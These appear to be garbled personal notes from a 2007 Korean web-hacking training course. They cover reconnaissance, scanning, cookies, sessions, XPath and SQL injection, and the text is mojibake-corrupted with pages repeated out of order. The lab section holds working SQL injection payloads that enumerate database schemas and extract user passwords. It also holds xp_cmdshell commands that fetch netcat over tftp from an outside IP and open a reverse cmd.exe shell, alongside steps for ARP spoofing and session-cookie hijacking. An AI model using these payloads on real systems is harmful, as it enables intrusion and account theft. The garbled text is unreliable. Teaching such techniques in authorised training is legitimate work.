kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 12
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
Unexpercted Method ์ ์ก
๋์ผ์์ฒญ ๋ฐ๋ณต ์ ์ก
์ทจ์ฝ์ ์ค์บ(system)
Xscan
Nessus
n-stealth security scanner
์ทจ์ฝ์ ์ค์บ(Web Server amp WAS amp Web App)
APP SCANNER
ACUNETIX
NSTALKER SCANNER
์ค์บ ISSUE
BASIC DIGEST NTML CERT
FORM-BASED
์ธ์ฆ์ ๋ณด ์ค์
์ค์บ ๊ฐ๋(๋ฉํฐ ์ปค๋ฅ์ ํ์์์ ๊ณต๊ฒฉ๋ชจ๋๋น๊ณต๊ฒฉ๋ชจ๋)
๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
ACCOUNT ์์ง
OS์ ๋ณด์ ๋ฐ๋ฅธ ์ทจ์ฝ์ ์์ง
ํฌํธ๋ณ ์๋น์ค ์ทจ์ฝ์
์น์๋ฒ ์ ์ฒด๊ตฌ์กฐ ๋ถ์
์ฃผ์
ํ๋ ํ๋
์์ค๋ถ์
์ฟ ํค๋ถ์
์ธ์ ID์์ฑ ์ทจ์ฝ์ ๋ถ์
๊ณต๊ฒฉ
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
๋ฌด์์ ๊ณต๊ฒฉ
์ฌ์ ๊ณต๊ฒฉ
๊ณต๊ฒฉ์ด์
์์ง๋ ACCOUNT ์ ๋ณด๋ฅผ์ด์ฉ
OSNETWORK SERVICE ๊ณต๊ฒฉ
WEBSERVER WEBAPP SERVER WEBAPPLICATION
SQLISCANNER
๊ถํ ์์น
์ํ
ํ์์ ๋ณด ์์
Cookie Stealing
CSRF
์์ง
CSRF
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 13
์ ์ ์กฐ๊ฑด์ ๋ด๋ถ๋ง์ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋ ์๊ณ ์์ ๊ฒฝ์ฐ
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
OWASPWASC
์์์
์น ์ดํ๋ฆฌ์ผ์ด์ ์ทจ์ฝ์ ๊ณต๊ฒฉ
์ํ๋์ ๋ฐ๋ผ ๊ณต๊ฒฉ
๊ฐ์ฉ์ฑ์ ๋จ์ดํธ๋ฆฌ๋ ๊ณต๊ฒฉ์ ์ธ
์๋ฒ์ shellํ๋ or๊ด๋ฆฌ์ ์ํธ ํ๋
๋ฐ์ดํฐ ์ด๋ ํ์ฉ๊ธ์ง
Ethical Hacking์ธ ๊ฒฝ์ฐ ๊ณ ๊ฐ์ ์๊ตฌ์ฌํญ ๋ฐ์
์คํ์ ๊ฑฐ
์น ์ทจ์ฝ์ ์ค์บ๋ ๊ฒฐ๊ณผ ๋ถ์
ONE WAY WEB HACKING ์ฝ์ด๋ณด๊ธฐ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 14
SQL INJECTION
GETPOST ํ๋ผ๋ฏธํฐ HTTP REQUEST ํ๋ผ๋ฏธํฐ ์ฟ ํค ๊ฐ
๊ธฐํ ์๋ฒ์์ ์ฒ๋ฆฌํ๋ ๋ชจ๋ ํด๋ผ์ด์ถํธ ๊ฐ
ํด๋ผ์ด์ถํธ ์ ๋ ฅ ๊ฐ ์ ํ
ํด๋ผ์ด์ถํธ์์ ์ ๋ ฅ๋ ๊ฐ์ด ์ ํจ์ฑ ๊ฒ์ฆ๊ณผ์ ์์ด sql ๋ฌธ์ ํฌํจ๋๋ ๊ฒฝ์ฐ
MAIN CAUSE
Impact
์ธ์ฆ์ฐํ
๋ฐ์ดํฐ๋ฒ ์ด์ค ๋คํ ์กฐ์ ์์ฑ ํ๊ดด
DML D์ด ๋ฑ ์์ํ ์ ์๋ ๋ชจ๋ ์์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ปจํธ๋กค
์์คํ ๋ช ๋ น์ด ์คํ
COUNTERMEASURE
์ ๋ ฅ๊ฐ ๊ฒ์ฆ
์ต์๊ถํ ๋ถ์ฌ(SYSTEMDBMSDatabase)
์ธ์ฆ์ฐํ
์ธ๊ฐ๋ ์ฌ์ฉ์์ ID PW ๋ฅผ ์ ๋ ฅํ์ง ์๊ณ ๋ ์ธ์ฆ์ ์ฐํํ๋ ํ์
ID PW๋ฅผ ๋ชจ๋ฅด๋ ์ํ์์๋ ์ ์ ํ ๊ตฌ์ฑ๋ ๋ฌธ์์ด์ ์ ๋ ฅํ์ฌ ์ธ์ฆ์ ์ฐํํ๋ ๊ฒ์ด ๊ฐ๋ฅ
์ ๋ ฅ๋ ๋ฌธ์์ด์ SQL ๋ฌธ์ ์ผ๋ถ๋ก ์ฝ์ ์ด ๋์ด ์คํ๋จ
์ธ์ฆ ์ฐํ์ ์ฌ์ฉ๋๋ ์ ๋ ฅ๊ฐ์
๋ฌธ๋ฒ์ ์ค๋ฅ๋ฅผ ์ํค์ง ์์์ผ ํจ
WHERE์ ์ ์กฐ๊ฑด์ด ํญ์ ์ฐธ์ด ๋๋๋ก ์กฐ์
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ผ๋ฐ์ ์ธ ์ธ์ฆ ์ ์ฐจ
1IDPW ์ ๋ ฅ
2SQL Query ์์ฑ
3DATABASE์ ์ฟผ๋ฆฌ ์ ์ก
4DATABASE์์ ์ฟผ๋ฆฌ๋ฌธ ์คํ
5๋ฐํ๋๋ RETURN๊ฐ์ ๋ฐ๋ผ ์ธ์ฆ์ฌ๋ถํ๋จ
SQL INJECTION ์ ์ฐจ
DB ์คํค๋งํ์ (DBTABLECOLUMN ํ๊ฒฝ์ ๋ณด๋ฑ ํ์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ ํ์
ํ ์ด๋ธ์ด๋ฆ ํ์
์ปฌ๋ผ์ด๋ฆ ํ์
๋ชจ๋ SQL INJECTION์ ์ ๋ ฅ๊ฐ์ ๋ํ ์ ํจ์ฑ ๊ฒ์ฆ์ ํ์ง ์๊ธฐ ๋๋ฌธ์ ๋ฐ์ํ๋ค ์๋ฌ๋ฅผ ์ ๋ํ์ฌ ํ๋์ ์ ๋ณด๋ฅผ ๋์ถ์ํจ๋ค
DBMS ๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ ์ง์คํธ๋ฆฌ์ ์ ๊ทบํ๋ ๊ฒ์ด ๊ฐ๋ฅ
DBMS๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ์ฟผ๋ฆฌ๋ฅผ ํตํ ์๋น์ค ์ ์ด๊ฐ ๊ฐ๋ฅ
OYES MALL (SQL INJECTION์ ์ด์ฉํ ๊ด๋ฆฌ์ ๊ถํ ํ๋ ์ค์ต
ํ๊ฒฝ์(2000ASPMS-SQL2000)
์ค๋น๋ ์ผํ๋ชฐ์ด๋ค
์ฒซ๋ฒ์งธ ๋ฐฉ๋ฒ
Web Hacking 3์ผ์ฐจ
2007๋ 10์ 25์ผ ๋ชฉ์์ผ
์ค์ 1200
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 15
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
User-AgentBlaBla Client
HTTP RESPONSE์ ์ฃผ์ ์๋ต ์ฝ๋
์ฃผ์ ์๋ต์ฝ๋
200 OK 400 BadRequest
201 Created 401 Unauthorized
202 Accepted 403 Forbidden
404 Not Found 301 Moved permanently
302 Found 500 Internal Server Error
HTTP ๊ด๋ ฆ ๊ธฐ์
์ฟ ํค
94๋ ๋ท์ค์ผ์ดํ์์ ๊ฐ๋ฐ
์๋ฒ๊ฐ ์์ฑํ๊ณ ํด๋ผ์ด์ถํธ์ ์ ์ฅ์ํค๋ ๋ฐฉ์
์ ์ฅ์๊ตฌ์ (Persistent๋์คํฌ)๋ฐ์๊ตฌ์ (Non-Persistent ๋ฉ๋ชจ๋ฆฌ)
๋ณด์๋ณด์๋น๋ณด์
์ ํํฌ๊ธฐ์ ํ(4k)๋ณ์์ ํ(2k)
ํ๋ฒ ์ ์ฅ๋ ์ฟ ํค๋ ์ฟ ํค์ ์ ํจ๊ธฐ๊ฐ์ด ์ง๋์ง ์๋ ํ ํด๋น ๋๋ฉ์ธ์ ์ ์์ ๋ธ๋ผ์ฐ์ ๊ฐ ์๋์ผ๋ก ํ์ฌํ์ฌ ์ ์ก
ํ๊ฒ ๋จ
์ฟ ํคํ์ผํํ์ฌ์ฉ์์ด๋ฆ์ ์ํ์ฌ์ดํธ
์ฟ ํคํ์ผ๋ด์ฉ๊ฐ๋ฐ์๊ฐ ์ค์ ํ๊ธฐ ๋๋ฆ
๋ํดํธ ๋๋ ํ ๋ฆฌ CDocuments and Setting์ฌ์ฉ์์ด๋ฆCookies
๊ธฐ๋ณธํฌ๋งท
Set-cookie
Name=value ์ฟ ํค์ ์ด๋ฆ
Expire=date ์ฟ ํค์ ์ ํจ๊ธฐ๊ฐ
Domain=domain ๋๋ฉ์ธ
Path=path ์ฟ ํค๋ฅผ ์ด์ฉํ์ฌ ์ ์์ฌ๋ฅํ URL
Secure ๋ณด์๋น๋ณด์์ค์
๊ด๋ ฆ ISSUE
์ฌ์ฉ์ ์์์กฐ์ ๋ฐ ์ค๋ํ ํ๋ก์ ๋ฑ์ ํตํ ๋ณ์กฐ๊ฐ๋ฅ
XSS๋ฑ์ ํตํ ํ์ธ์ ์ฟ ํคํ์ทจ
์ฌ์๊ณต๊ฒฉ์ ๋ฌด๋ฐฉ๋น
๋์๋ฐฉ์ ์ฟ ํค๋ ์ฌ์ฉํ์ง ์๋๋ค๋ ๊ธฐ๋ณธ ์ฒ ์น ์ฌ์ฉํ ๊ฒฝ์ฐ ๊ฒ์ฆ๋ ์ํธํ ์๊ณ ๋ฆฌ์ฆ์ผ๋ก ์ต์ํ์ ์ ๋ณด๋ง
์ ์ฅ ์ฟ ํค์ ๋ฌด๊ฒฝ์ค ๊ฒ์ฌ๋ฅผ ์ํด ์ ์ก๋๋(ํน์ ๋ณ์ ๊ฐ+TimeStamp)๋ฑ์ ์ ๋ณด๋ฅผ ํด์ํ ๊ฐ๊น์ง ๊ฐ์ด
์ ์ก ์๋ฒฝํ์ง ์์ผ๋ ์ธ์ ๊ณผ ๊ฐ์ด ๋ณํ์ ๋ณด์์ฑ ํฅ์
์ธ์ (SESSION)
HTTP์ ์ ์ธ์ ์ ๋ํ ์ฒ๋ฆฌ๋ฅผ ๋ด๋นํ๋ ๊ธฐ์
Server Side ๊ธฐ์ ๋ก HTTP์ Stateless ํ ํน์ฑ์ ๋ณด์ํ๊ธฐ ์ํด Uniq ํ ID๋ฅผ ์์ฑํ์ฌ ํ์ฌ ์ ์ํ ํด๋ผ์ด์ถํธ์๊ฒ
ํ๋นํด์ฃผ๊ณ ๊ธฐ์ตํ๋ ๋ฐฉ์
๊ณผ๊ฑฐ cookie์ ์ ์ฅํ๋ ๋ณ์ ๊ฐ ์ ์ด๊ธฐ ์ ์ ์ ํ๋นํ๊ฒ ๋จ
ํ๋นํ ๋ณ์๋ ์๋ฒ์ ์ ์ฅ๋๋ฉฐ ํด๋ผ์ด์ถํธ ์ธก ์๋ ์ธ์ ID๋ง ๋ถ์ฌ๋จ
์ฃผ๋ก Web Application Server ๋ Web Server ๋ฅผ ํ๋น ๋ฐ์ผ๋ฉฐ ์ด๋ ํด๋น ID์ ํน์ ์ ๋ณด๋ฅผ ์ ์ฅํ ์ ์์
ํด๋ผ์ด์ถํธ๋ ์๋ฒ์ ํต์์ SESSION ID๋ง ์ฃผ๊ณ ๋ฐ์
์ธ์ ID
WASWS ์ธ์ ID๋ณ์
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 5
IIS ASPSESSIONID
APACHE SESSIONID
TOMCAT JSESSIONID
PHP PHPSESSID
๊ธฐํ JServerSessionID
JWSESSIONID
SESSID
SESSION
SID
SESSION_ID
์ธ์
WASWS ๋ง๋ค ๋ค๋ฅด์ง๋ง ๋ณดํต 10๋ถ20๋ถ ์ค์ ์
์ฌ์ฉ์๊ฐ ๋น์ ์ ๋ก๊ทธ์์ ํ๊ฑฐ๋ Request ์์ฒญ ์์ ์ ์ ํ์ ์์ ๊ฐ ์ด๊ณผ ํ ํด๋น ์ธ์ ID๋ ์๋ฉธ
์ธ์ ๋ ์ฟ ํค์ ๊ฐ์ ์ ํจ๊ธฐ๊ฐ ์์
๊ด๋ ฆ ISSUE
์ด๊ธฐ์ธ์ ๊ฐ์ฒด ์์ฑ์ ํด๋ผ์ด์ถํธ์ IP ๋ฉ์ธ๋ณด๋SN ํ๋๋์คํฌ SN๋ฑ Uniq ํ ๊ฐ์ ์ค์ ํ ํ ๋งค ํ์ด์ง๋ง๋ค
์ธ์ฆ๋น๊ต๋ฅผ ํตํด ๊ณต๊ฒฉ์ ์๋ฐฉํ ์ ์์
์ฌ์ฉ์ ์์์กฐ์์ ํตํ ๊ณต๊ฒฉ์๋
์ธ์ ์ด๊ธฐ ์์ฑ์๋ง๋ค ์๋ก์ด ID๋ฅผ ์์ฑ
์ฌ์๊ณต๊ฒฉ
์ค์ต
Cookie๊ฐ์ ์ค๋ํ ํด์ ์๋๋ฐฉ Cookie๊ฐ์ผ๋ก ์๋๋ฐฉ ๊ณ์ ์ผ๋ก ๋ก๊ทธ์ธ
์ค์ตํ๊ฒฝWinArpSpoof or CainampAbel or wireshark
Wireshark๋ก arp ์คํธํ์ ํด์ ํจํท์ด ๋์๊ฒ ๋๊ฒจ์ค๊ฒ ๋ง๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 6
ํ๋ฉด๊ณผ ๊ฐ์ด wireshark๋ฅผ ์ค๋นํ๋ค
์คํธํ์ ํ๊ณ ์์ผ๋ฉด ์๋๋ฐฉ ์ธก์์ wwwnavercom ์ ๋ก๊ทธ์ธ์ ํ๊ฒ ๋๋ฉด ํจํท์ด ๋ ๋ผ ์ค๊ฒ ๋๋ค ์ฌ๊ธฐ์ ์ฐ๋ฆฌ๋
๋ก๊ทธ์ธ ๊ด๋ ฆ ํจํท ๋ง ์์๋ณด๊ธฐ ์ํด ํํฐ์ httprequestmethod == POST ๋ฅผ ์น๋ค
๋ค์๊ณผ ๊ฐ์ด ๋์ฌ ๊ฒ์ด๋ค Set-Cookie๋ถ๋ถ์ ๋ณต์ฌํด ๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 7
๋ค์๊ณผ ๊ฐ์ด ์ค์ ์ ์กฐ๊ธ ๋ณ๊ฒฝ ์์ผ์ค๋ค
๋ค์๊ณผ ๊ฐ์ด ์ ํ ์ ํด๋๋ค
๊ทธ๋ผ ๋ค์๊ณผ ๊ฐ์ด ๋ก๊ทธ์ธ์ด ๋๋ ์ฅ๋ฉด์ ๋ณผ ์ ์์ ๊ฒ์ด๋ค
์ฌ๊ธฐ์๋ XSS๋ฅผ ์ฌ์ฉํ์ง ์๊ณ Network์์์ Cookie๊ฐ์ ํ์ณ์ ๊ณ์ ์ ํ์ณ ๋ณด์๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 8
XML ํน์ง
๋ฌธ์์ ๋ด์ฉ๊ณผ ๋์์ธ์ด ์์ ํ ๋ถ๋ฆฌ
๋ฌธ์๊ตฌ์กฐ๋ XML๋ก ํ๋ฆฌ์ ํ ์ด์ ์ XSL์ ํตํด
๋ค์ํ ๋ฐฉ์์ ๋งํฌ ๊ธฐ๋ฅ ์ ๊ณต
ํ์คํ๋ DTD์ ํตํด ๋ชจ๋ ๋ถ์ผ์ ์ฌ์ฉ๊ฐ๋ฅ
DOM(Document Object Model)
SAX(Simple API for XML)
XML๊ตฌ์กฐ2๊ฐ์ง ๋ํ์ ๋ชจ๋ธ์กด์ฌ
๊ตฌ์ฑ์์ ์ค๋ช
์๋ฆฌ๋จผํธ ๋งํฌ์ ํ๊ทธ์ ๊ทธ ์์ ํฌํจ๋ ๋ด์ฉ
๋น ์๋ฆฌ๋จผํธ ๋ด์ฉ์ ํฌํจํ์ง ์๋ ๋น ์๋ฆฌ๋จผํธ
๋ฃจํธ ์๋ฆฌ๋จผํธ ๋ฌธ์๋ด ๋ชจ๋ ์๋ฆฌ๋จผํธ์ ๋ด์ฉ์ ํฌํจํ๊ณ ์๋ XML ๋ฌธ์์ ์๋ฆฌ๋จผํธ
์์ฑ ์๋ฆฌ๋จผํธ์ ํฌํจ๋์ด ์ถ๊ฐ์ ์ธ ์ ๋ณด๋ฅผ ์ ๊ณต
ltimg src=balbalbalgtbalbalballtimggt
์ํฐํฐ ํ ์คํธ ๋ฐ์ด๋๋ฆฌ๋ฐ์ดํฐ ๋น ์์คํฌ ๋ฌธ์๋ฅผ ์ ์ฅํ๋๋ฐ ์ฌ์ฉ
์ฒ๋ฆฌ๋ช ๋ น ์ ์ฒด ๋ฌธ์๋ ๋ฌธ์์ ์ผ๋ถ๋ฅผ ์ฒ๋ฆฌํ๋ ์์ฉํ๋ก๊ทธ๋จ๊ณผ ์ฐ๊ฒฐํด ์ฃผ๋ ๋ช ๋ น์ด lt gt
์ฃผ์ XML ํ๋ก์ธ์๊ฐ ํด์ํ์ง ์๋ ์ค๋ช ๋ฌธ
lt-- --gt
CDATA์น์ ํน์ํ ๋ฌธ์๋ฅผ ์ผ๋ฐ ํ ์คํธ๋ก ์ธ์ํ๋๋ก ํ๋ ํ๊ธฐ๋ฒ
lt[CDATA[hellipstring]]gt
Xpath
Xml ๋ฌธ์์ ๋ํ ์ง์์ถ์ด
SQL๋ฌธ์ ํน์ ํ ์ด๋ธ์ ํ๊ณผ ์ด์ ์ ํ
Xpath๋ ํน์ XML๋ฌธ์์ ๋ ธ๋์ ๋ ธ๋์ ์ ์ ํ
๊ด๋ ฆ Issue
์)bookbook[ISBN=1111 or 1=1]
๋ชจ๋ book ๋ ธ๋๋ค์ ์ ๊ทบ๊ฐ๋ฅ
Xpath๊ณต๊ฒฉ
๋ํ ํ์ด๋ก๋ ๊ณต๊ฒฉ(like DOS)
XML์ ๋ ธ๋์ ์์ฑ์ด ์ค์ฒฉ ์ ์ถ๋ ์ ์๋ค๋ ์ ์ ์ ์ฉ
ํน์ ๋ ธ๋์์ ๋์ผ ๋ ธ๋๋ช ๋ฐ๋ณต์ ์ถ์์ฑ ๋ฌดํ์ ์ถ
์ฌ๊ท ํ์ด๋ก๋ ๊ณต๊ฒฉ
`or loginid(nodeLoginID())=LoginID or a=b
07๋ ํดํน๋ฐฉ์ด๋ํ๋ฌธ์
WebService
์ ์๋คํธ์ํฌ์์์ ์ ๊ทบ ๊ฐ๋ฅํ ์ํํธ์จ์ด ๊ธฐ๋ฅ๋จ์๋ก ํ๋ซํผ ํ๋ก๊ทธ๋๋ฐ ์ถ์ด ๋ฐ ์ปดํฌ๋ํธ ๋ชจ๋ธ์ ๋
๋ฆฝ์ ์ธ ๊ธฐ์ ๋ก ๋ง๋ค์ด์ง ์ํํธ์จ์ด
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
Web Hacking 2์ผ์ฐจ
2007๋ 10์ 23์ผ ํ์์ผ
์ค์ 934
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 9
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
๊ณต๊ฒฉ์ ์ฐจ
์ ๋ณด์์ง
Profiling
๋ถ์
Analysis
๊ณต๊ฒฉ
AttackEcploit
hellip
์ฌํ๊ณตํ
๊ฒ์์์ง
FootPrinting
PortScan
Web Site ๋ฏธ๋ฌ๋ง
Web ๊ตฌ์กฐ๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
Account ์์ง
OS์ ๋ณด์ทจ์ฝ์
ํฌํธ๋ณ์๋น์ค์ทจ์ฝ์
์ ์ฒด๊ตฌ์กฐ์์ค์ฃผ์
์ฟ ํค๋ฑ ๋ถ์
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
BF Guessing
OSNetwork Service
Exploitation
๊ถํ์์น
OWASPWASC๋ฑ์ ์ํ ๊ณต๊ฒฉ
๋ณด๊ณ ์
1์ ๋ณด์์ง
์ฌํ๊ณตํ
๋๋ฉ์ธ ์ ๋ณด IP Block ์ ๋ณด
Whois
Dig
Whosip
Netcraft
๊ธฐ๋ณธ์ ๋ณด
httpwebarchiveorg
Google Cache
Web Archive
httpjohnnyihackstuffcom
์ฌ์ ์ฌ(googledorkpdf)
Google Dork
Google hacking DB ์ฌ์ฉ
Google API Key(ํค ๋ฐ๊ธ ํ์ง)
SiteDigger Wikto
๊ฒ์์์ง(No-Tech Hacking)
๊ตฌ๊ธ ํดํน ํค์๋ ์ ๊ณต ์ฌ์ดํธ
Footprinting Web Server
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 10
AFD(Acitive Filter Detection)
ICMP TTL๊ฐ์ ์กฐ์ ํด๊ฐ๋ฉฐ ์น ์๋ฒ ํ์ง
netcraftcom
Stealth Scan-sS
Normal Scan-sT-sU
Network Services Version Scan-sV
OSDetection-O-A
DoNotPing_P0
Idle scan
IDS์ฐํ
httpunicornscanorg
Unicorn scan -mT -p -v -r 2501921681024q
Unicornscan
Nc
jikto
Port Scan(Port Mapping)
httTrack
Web Site Mirroring
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 11
-grepegrep awksedsortuniq(moreheadless)๋ฑ ํ์ฉ
Mirroring ํ ์ ์ ๋ถ์
balckwindow
InteliTamper
Wikto
Web๊ตฌ์กฐ ๋ถ์(๋ฐ์๋)
Httpwatch
TamperlE
Cooxie
LiveHttpHeaders(firefox)
Command line tool(nccurlopenssl)
Manual Analysis
ParosWebscrabFidderBurpIntruder
SoftwareProxy
Web๊ตฌ์กฐ๋ถ์(์์์ )
๊ด๋ฆฌ์ํ์ด์ง
์๋ฃ์ค(web shell)
ํต๊ณ ์ํ ํ์ด์ง
ํ์๋ฑ๋ก์ฐํธ๋ฒํธ ์กฐํ(์ธ์ ์ ๊ณต๊ฒฉ)
(์ธ์ ์ ์ ์ ๋ ฅ๊ฐ์ ๋ฃ์์๋ ๊ฒฐ๊ณผ๋ฅผ ๋ฟ๋ ค์ฃผ๋ ํ์ด์ง๋ฅผ ์ฐพ์์ผํ๋ค)์๋ณด์ฌ์ฃผ๋๊ฑด ๋ธ๋ผ์ธ๋ ์ธ์ ์
์ํธ๋ถ์ค(์ํธ ํ๋ ์์)
์ ๋ณด์์ (์ํ์์ง์์น๊ธฐํ)
ํ์๊ฐ์ ํ์ด์ง
๊ฒฐ์ ํ์ด์ง
Basic Banner Garbbing
Http resonse ํค๋ ์์
Http resonse ํค๋ ์กด์ฌ ์ ๋ฌด
Http resonse ํค๋์ ํน์ ๊ฐ
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 12
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
Unexpercted Method ์ ์ก
๋์ผ์์ฒญ ๋ฐ๋ณต ์ ์ก
์ทจ์ฝ์ ์ค์บ(system)
Xscan
Nessus
n-stealth security scanner
์ทจ์ฝ์ ์ค์บ(Web Server amp WAS amp Web App)
APP SCANNER
ACUNETIX
NSTALKER SCANNER
์ค์บ ISSUE
BASIC DIGEST NTML CERT
FORM-BASED
์ธ์ฆ์ ๋ณด ์ค์
์ค์บ ๊ฐ๋(๋ฉํฐ ์ปค๋ฅ์ ํ์์์ ๊ณต๊ฒฉ๋ชจ๋๋น๊ณต๊ฒฉ๋ชจ๋)
๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
ACCOUNT ์์ง
OS์ ๋ณด์ ๋ฐ๋ฅธ ์ทจ์ฝ์ ์์ง
ํฌํธ๋ณ ์๋น์ค ์ทจ์ฝ์
์น์๋ฒ ์ ์ฒด๊ตฌ์กฐ ๋ถ์
์ฃผ์
ํ๋ ํ๋
์์ค๋ถ์
์ฟ ํค๋ถ์
์ธ์ ID์์ฑ ์ทจ์ฝ์ ๋ถ์
๊ณต๊ฒฉ
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
๋ฌด์์ ๊ณต๊ฒฉ
์ฌ์ ๊ณต๊ฒฉ
๊ณต๊ฒฉ์ด์
์์ง๋ ACCOUNT ์ ๋ณด๋ฅผ์ด์ฉ
OSNETWORK SERVICE ๊ณต๊ฒฉ
WEBSERVER WEBAPP SERVER WEBAPPLICATION
SQLISCANNER
๊ถํ ์์น
์ํ
ํ์์ ๋ณด ์์
Cookie Stealing
CSRF
์์ง
CSRF
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 13
์ ์ ์กฐ๊ฑด์ ๋ด๋ถ๋ง์ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋ ์๊ณ ์์ ๊ฒฝ์ฐ
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
OWASPWASC
์์์
์น ์ดํ๋ฆฌ์ผ์ด์ ์ทจ์ฝ์ ๊ณต๊ฒฉ
์ํ๋์ ๋ฐ๋ผ ๊ณต๊ฒฉ
๊ฐ์ฉ์ฑ์ ๋จ์ดํธ๋ฆฌ๋ ๊ณต๊ฒฉ์ ์ธ
์๋ฒ์ shellํ๋ or๊ด๋ฆฌ์ ์ํธ ํ๋
๋ฐ์ดํฐ ์ด๋ ํ์ฉ๊ธ์ง
Ethical Hacking์ธ ๊ฒฝ์ฐ ๊ณ ๊ฐ์ ์๊ตฌ์ฌํญ ๋ฐ์
์คํ์ ๊ฑฐ
์น ์ทจ์ฝ์ ์ค์บ๋ ๊ฒฐ๊ณผ ๋ถ์
ONE WAY WEB HACKING ์ฝ์ด๋ณด๊ธฐ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 14
SQL INJECTION
GETPOST ํ๋ผ๋ฏธํฐ HTTP REQUEST ํ๋ผ๋ฏธํฐ ์ฟ ํค ๊ฐ
๊ธฐํ ์๋ฒ์์ ์ฒ๋ฆฌํ๋ ๋ชจ๋ ํด๋ผ์ด์ถํธ ๊ฐ
ํด๋ผ์ด์ถํธ ์ ๋ ฅ ๊ฐ ์ ํ
